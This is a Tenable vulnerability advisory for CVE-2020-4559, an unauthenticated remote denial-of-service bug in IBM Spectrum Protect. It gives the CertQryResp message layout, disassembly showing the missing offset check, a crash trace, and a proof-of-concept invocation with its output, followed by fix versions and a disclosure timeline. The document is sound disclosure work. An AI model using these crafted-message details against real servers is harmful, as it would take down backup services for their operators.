Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

IBM Spectrum Protect CertQryResp Unauthenticated Remote DoS

High

Synopsis

Tenable research discovered a DoS vulnerability in IBM Spectrum Protect (ISP) 8.1.9.300. The flaw exists in the adsmdll.dll and dstadll.dll files due to improper validation of user-supplied data when processing a CertQryResp verb message sent to default TCP port 1500.

An unauthenticated, remote attacker can exploit the issue, via a series of specially crafted messages, to terminate the dsmsvc and dstasvc (Storage Agent) processes.

The CertQryResp verb message has the following format:

//  be = big endian
// 
// Mandatory verb header
struct hdr
{
   be16 verbLen;  // 16-bit total len of the verb; 0 if verbType is 8
   int8 verbType; // 8-bit verb type 
                  // if verbType == 8, it's an extended verb and
                  // hdr_ex follows this header
   int8 magic;    // must be 0xCA 
};

// Optional extended verb header
// Used for verbTypes that are greater than 0x100
struct hdr_ex
{
   be32 verbType; // 32-bit verb type
   be32 verbLen;  // 32-bit total len of the verb
};

struct CertQryResp
{
   // Generic headers 
   hdr hdr;          // hdr.verbType = 8
   hdr_ex hdr2;      // hdr2.verbType = 0x00031900
   // verb-specific header starts
   int8 version;     
   be16 dataOffset;  // offset to the msg where the verb data starts
   be16 opRC;
   be16 certFormat;
   be16 certOffset;  // offset to the verb data where the certificate starts
   be16 certLength;
   // verb data starts
   byte cert[certLength];
};

All ISP verbs are validated in the SmIsValidVerbEx() function in adsmdll.dll/dstadll.dll. However, the function only checks to make sure CertQryResp.dataOffset falls within the message boundary (i.e., sizeof(CertQryResp)):

.text:000000018099AD2F      lea     rcx, [rdi+verbCertQryResp.dataOffset]
.text:000000018099AD33      call    GetTwo
.text:000000018099AD38      movzx   eax, ax
.text:000000018099AD3B      cmp     eax, r15d ; r15d = MsgSize
.text:000000018099AD3E      jbe     ok_1809A331

It does not check whether or not CertQryResp.dataOffset + CertQryResp.certOffset is within the message boundary. When the CertQryResp verb message is processed, the pointer to the certificate is calculated as: pCert = pCertQryResp + pCertQryResp->dataOffset + pCertQryResp->certOffset:

.text:0000000180AE8466      lea     rcx, [rsi+verbCertQryResp.certOffset]
.text:0000000180AE846A      call    GetTwo
.text:0000000180AE846F      lea     rcx, [rsi+verbCertQryResp.dataOffset]
.text:0000000180AE8473      movzx   ebx, ax
.text:0000000180AE8476      call    GetTwo
.text:0000000180AE847B      lea     rcx, [rsi+verbCertQryResp.certLength]
.text:0000000180AE847F      movzx   r15d, ax
.text:0000000180AE8483      add     r15, rbx ; dataOffset + certOffset
.text:0000000180AE8486      add     r15, rsi
.text:0000000180AE8489      call    GetTwo
.text:0000000180AE848E      movzx   r14d, ax

This can cause an Out-of-bounds read on the certificate if CertQryResp.certOffset contains a value (i.e., 0xffff) that is greater than the message size. The Out-of-bounds read can cause an access violation (i.e., pCert lands in an inaccessible page), resulting in process termination:

(d6c.74c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
MSVCR120!MoveSmall+0x1aa:
00007fff`4877c64a 4c8b540af8      mov     r10,qword ptr [rdx+rcx-8] ds:000001d3`2f477fff=????????????????
0:414> k
 # Child-SP          RetAddr           Call Site
00 00000028`b01fe198 00007fff`42755475 MSVCR120!MoveSmall+0x1aa [f:\dd\vctools\crt\crtw32\string\amd64\memcpy.asm @ 362] 
01 00000028`b01fe1a0 00007fff`427d3324 gsk8cms_64!GSKASNUtility::asncpy+0x2a5
02 00000028`b01fe1d0 00007fff`40f9e642 gsk8cms_64!GSKString::GSKString+0x64
03 00000028`b01fe210 00007fff`40f766d4 gsk8km_64!GSKKM_strerror+0x254b2
04 00000028`b01fe720 00007fff`37d24ed7 gsk8km_64!GSKKM_OpenKeyDbData+0xa4
05 00000028`b01fe780 00007fff`37e984eb adsmdll!tlsValidateKeyDbPw+0xb7
06 00000028`b01fe850 00007fff`37e99286 adsmdll!HandleCertQryResp+0x1cb
07 00000028`b01fe8d0 00007fff`37e96b7a adsmdll!HandleNegotiate+0x756
08 00000028`b01fea30 00007fff`37d75c46 adsmdll!SmV2AuthProcess+0x28a
09 00000028`b01feab0 00007fff`380d00da adsmdll!smExecuteSession+0x3a6
0a 00000028`b01ff7f0 00007fff`373bc413 adsmdll!SessionThread+0x43a
0b 00000028`b01ff8b0 00007fff`48764f7f adsmdll!startThread+0x153
0c 00000028`b01ff900 00007fff`48765126 MSVCR120!_callthreadstartex+0x17 [f:\dd\vctools\crt\crtw32\startup\threadex.c @ 376] 
0d 00000028`b01ff930 00007fff`546b84d4 MSVCR120!_threadstartex+0x102 [f:\dd\vctools\crt\crtw32\startup\threadex.c @ 354] 
0e 00000028`b01ff960 00007fff`5711e871 KERNEL32!BaseThreadInitThunk+0x14
0f 00000028`b01ff990 00000000`00000000 ntdll!RtlUserThreadStart+0x21

Proof of Concept

Attached is a PoC to terminate dsmsvc.exe. The PoC can be used as follows:

python3 ibm_spectrum_protect_CertQryResp_dos_CVE-2020-4559.py -t <target_host> -p 1500
...   
connection 00000300: certSize 00001500, certOffset 0000f000
connection 00000301: certSize 00001600, certOffset 00001000
connection 00000302: certSize 00001600, certOffset 00002000
connection 00000303: certSize 00001600, certOffset 00003000
connection 00000304: certSize 00001600, certOffset 00004000
connection 00000305: certSize 00001600, certOffset 00005000
Traceback (most recent call last):
  File "ibm_spectrum_protect_CertQryResp_dos.py", line 110, in <module>
    r = recv_verb(s)
  File "ibm_spectrum_protect_CertQryResp_dos.py", line 47, in recv_verb
    hdr1 = s.recv(4)
ConnectionResetError: [Errno 104] Connection reset by peer

Note that we tested the PoC on a Windows Server 2016 virtual machine with 2 CPUs and 16 GB of memory. The script may or may not terminate dsmsvc.exe depending on the memory page where pCert lands. To produce a reliable crash, full page heap can be enabled on dsmsvc.exe:

C:\Program Files (x86)\Windows Kits\10\Debuggers\x64>gflags /p /enable dsmsvc.exe /full

This puts the CertQryResp verb message at the end of a page followed by a non-accessible guard page.

Solution

Upgrade to either 7.1.11.000 or 8.1.10.100.

Disclosure Timeline

05/11/2020 - Vulnerability discovered
05/12/2020 - Reported via CERT/cc web form. Report tracked as VRF#20-05-ZFGDR. 90-day date is Aug 10, 2020.
05/12/2020 - Tenable receives automated reply from CERT.
05/27/2020 - Tenable asks if CERT has reviewed this report.
05/27/2020 - CERT apologizes for the delayed response. Tells us about their new portal. They will send out the report tomorrow.
05/28/2020 - CERT notifies us that the report was sent to IBM.
05/28/2020 - Tenable thanks CERT for the update.
06/16/2020 - IBM has asked for 3 extra weeks, bringing disclosure to 08/31/2020.
06/22/2020 - Tenable denies request for 3 week extension. Allows for 2 weeks, per our policy. Pushes disclosure date to 08/24/2020.
06/29/2020 - IBM requests that we coordinate disclosure on 08/31/2020.
06/29/2020 - Tenable denies the request. Explains that we can push as far as 08/24/2020. Otherwise, we will disclose on 08/10/2020.
07/02/2020 - IBM explains that CERT sent the report to them on May 28. Cites our policy and and asks that we coordinate on an August 31 disclosure.
07/02/2020 - Tenable agrees, and updates the 90-day date to August 26, 2020. However, the coordinated date is within the grace period, so disclosure date is set at August 31. Asks IBM if we can contact them directly for future reports.
07/02/2020 - IBM agrees to us contacting them directly.
07/02/2020 - Tenable thanks IBM.
08/27/2020 - IBM notifies Tenable of the fix and bulletin release.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2020-4559
Tenable Advisory ID: TRA-2020-50
CVSSv2 Base / Temporal Score:
7.8 / 6.1
CVSSv2 Vector:
AV:N/AC:L/Au:N/C:N/I:N/A:C
CVSSv3 Base / Temporal Score:
7.5 / 6.7
CVSSv3 Vector:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Affected Products:
- IBM Spectrum Protect Server versions 8.1.0.000-8.1.10.000; 7.1.0.000-7.1.10.xxx
Risk Factor:
High

Advisory Timeline

08/28/2020 - Advisory published.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Try Tenable Web App Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Try Tenable Nessus Professional Free

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro Trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Try Tenable Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training